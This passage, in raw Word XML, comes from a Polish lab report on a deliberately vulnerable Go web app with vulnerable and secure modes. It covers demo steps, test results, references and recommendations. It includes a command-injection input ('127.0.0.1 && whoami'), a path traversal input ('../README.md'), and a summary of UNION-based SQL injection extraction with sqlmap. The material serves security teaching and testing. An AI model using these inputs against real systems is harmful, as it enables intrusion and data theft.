        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wpisać payload SQLi i pokazać nienaturalny wynik.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>W komentarzu pod postem zapisać payload XSS i pokazać renderowanie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wykonać sfałszowany POST CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Moderation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spróbować usunąć cudzy post.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../README.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1 &amp;&amp; whoami</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="73" w:name="sec73"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.3. Etap 3 - ten sam przebieg w secure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Po przełączeniu secure należy powtórzyć dokładnie te same payloady. Ten krok potwierdza, że poprawka nie polega na ukryciu formularza albo zmianie adresu URL, tylko na naprawie interpretacji danych po stronie serwera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="74" w:name="sec74"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.4. Etap 4 - powiązanie z kodem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Po części UI warto pokazać krótko cztery fragmenty kodu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">routing w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gdzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prowadzi do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProfileSettings()</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">handler CSRF w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>różnicę między SQL z konkatenacją i SQL parametryzowanym;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">różnicę między </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="75" w:name="sec75"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.5. Etap 5 - testy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Na końcu należy pokazać wynik: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go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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test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./...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go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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test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-tags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integration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-count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0E7490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-v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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2081" w:name="lst81"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 81. Komendy uruchamiające testy automatyczne projektu. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2081"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wynik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> potwierdza, że opis raportowy, kod i zachowanie aplikacji są spójne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="76" w:name="sec76"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>23. Testy i weryfikacja</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wykonano następujące kontrole:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3004" w:name="tbl4"/>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Tabela 4. Zestawienie danych raportowych. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3004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9EA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Kontrola</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
            <w:shd w:fill="D9EA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Wynik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templ generate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zakończone sukcesem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go test ./...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zakończone sukcesem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go build -o /private/tmp/bai-feature-check main.go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zakończone sukcesem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Screenshoty UI przez Playwright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wygenerowane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Kontrola screenshotów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sprawdzone, przycięte i dopasowane do raportu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OWASP ZAP baseline scan w Dockerze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zakończone, 60 URL, 14 ostrzeżeń, 0 nowych błędów krytycznych</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>W ramach weryfikacji uruchomiono także pełny zestaw testów integracyjnych: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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>go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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test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-tags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>integration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-count</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="0E7490"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1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-v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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2082" w:name="lst82"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 82. Komendy uruchamiające testy automatyczne projektu. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2082"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wynik: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Testy obejmują między innymi SQL Injection, Stored XSS, Path Traversal, Command Injection, autoryzację usuwania postów, cookies sesyjne oraz CSRF. Dodano również test potwierdzający, że </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest jedną funkcją: w trybie vulnerable przyjmuje sfałszowany POST bez tokena, a w trybie secure ten sam POST zostaje odrzucony.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="77" w:name="sec77"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24. Literatura i źródła</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10:2021</w:t>
      </w:r>
      <w:r>
        <w:t>, https://owasp.org/Top10/2021/, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP Cheat Sheet Series, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP Web Security Testing Guide, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Testing for SQL Injection - WSTG-INPV-05</w:t>
      </w:r>
      <w:r>
        <w:t>, https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PortSwigger Web Security Academy, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL injection UNION attacks</w:t>
      </w:r>
      <w:r>
        <w:t>, https://portswigger.net/web-security/sql-injection/union-attacks, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sqlmap project, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Usage documentation</w:t>
      </w:r>
      <w:r>
        <w:t>, https://github.com/sqlmapproject/sqlmap/wiki/Usage, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cwe.mitre.org/data/definitions/89.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cwe.mitre.org/data/definitions/79.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE-352: Cross-Site Request Forgery</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cwe.mitre.org/data/definitions/352.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cwe.mitre.org/data/definitions/22.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE-78: Improper Neutralization of Special Elements used in an OS Command</w:t>
      </w:r>
      <w:r>
        <w:t>, https://cwe.mitre.org/data/definitions/78.html, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">N. Provos, D. Mazières, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A Future-Adaptable Password Scheme</w:t>
      </w:r>
      <w:r>
        <w:t>, USENIX Annual Technical Conference 1999, https://www.usenix.org/conference/1999-usenix-annual-technical-conference/future-adaptable-password-scheme, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W. G. J. Halfond, J. Viegas, A. Orso, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A Classification of SQL-Injection Attacks and Countermeasures</w:t>
      </w:r>
      <w:r>
        <w:t>, ISSSE 2006, DOI: 10.1109/ASWEC.2006.40.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M. Liu, K. Li, T. Chen, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DeepSQLi: Deep Semantic Learning for Testing SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t>, arXiv:2005.11728, https://arxiv.org/abs/2005.11728, dostęp: 29.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTPie, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTTPie documentation</w:t>
      </w:r>
      <w:r>
        <w:t>, https://httpie.io/docs, dostęp: 30.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Web Security Testing Guide - Testing for Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t>, https://owasp.org/www-project-web-security-testing-guide/, dostęp: 30.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">16. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP ZAP, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ZAP Docker Documentation</w:t>
      </w:r>
      <w:r>
        <w:t>, https://www.zaproxy.org/docs/docker/, dostęp: 30.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">17. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP ZAP, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ZAP Baseline Scan</w:t>
      </w:r>
      <w:r>
        <w:t>, https://www.zaproxy.org/docs/docker/baseline-scan/, dostęp: 30.05.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">18. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">J. Clarke-Salt, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injection Attacks and Defense</w:t>
      </w:r>
      <w:r>
        <w:t>, 2nd edition, Syngress, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="78" w:name="sec78"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>25. Wnioski i dalsze rekomendacje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Projekt spełnia założenie porównania podatnej i zabezpieczonej aplikacji w ramach jednego, spójnego systemu. Podatności są widoczne w funkcjach, które mają normalne zastosowanie: wyszukiwarka, komentarze, logowanie, profil, moderacja, katalog członków, podgląd plików i diagnostyka hosta. Dzięki temu test bezpieczeństwa polega na użyciu zwykłej funkcji w sposób pokazujący błąd implementacyjny.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Najważniejszy przypadek, SQL Injection, pokazano w pełnym przebiegu ręcznym oraz narzędziowym. Ręczny atak wyjaśnia, dlaczego konkatenacja SQL jest błędna, jak dobrać liczbę kolumn, jak użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, jak odczytać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, jak wyciągnąć użytkowników i jak przejść do ukrytych draftów. Test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> potwierdza, że podatność jest rozpoznawalna z zewnątrz bez znajomości kodu źródłowego. Tryb secure blokuje oba podejścia przez parametryzację zapytań.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Najważniejsze rekomendacje dalszej pracy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dodać testy integracyjne dla nowych aliasów </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/gallery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/stream-check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/members</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dodać kontrolę typu pliku i rozszerzeń w uploadzie fanartów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dodać limity rozmiaru odpowiedzi dla podglądu pliku, aby LFI nie zalało UI dużym plikiem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dodać role moderator/admin do osobnych middleware, zamiast rozpraszać warunki w handlerach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dodać politykę CSP jako dodatkową warstwę ograniczającą skutki XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dodać audit log dla akcji moderacyjnych i zmian profilu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Rozdzielić mechanizm labowy od kodu produkcyjnego flagą build/runtime, żeby w realnym wdrożeniu nie dało się przypadkowo wystartować w trybie vulnerable.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Strona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7" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi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0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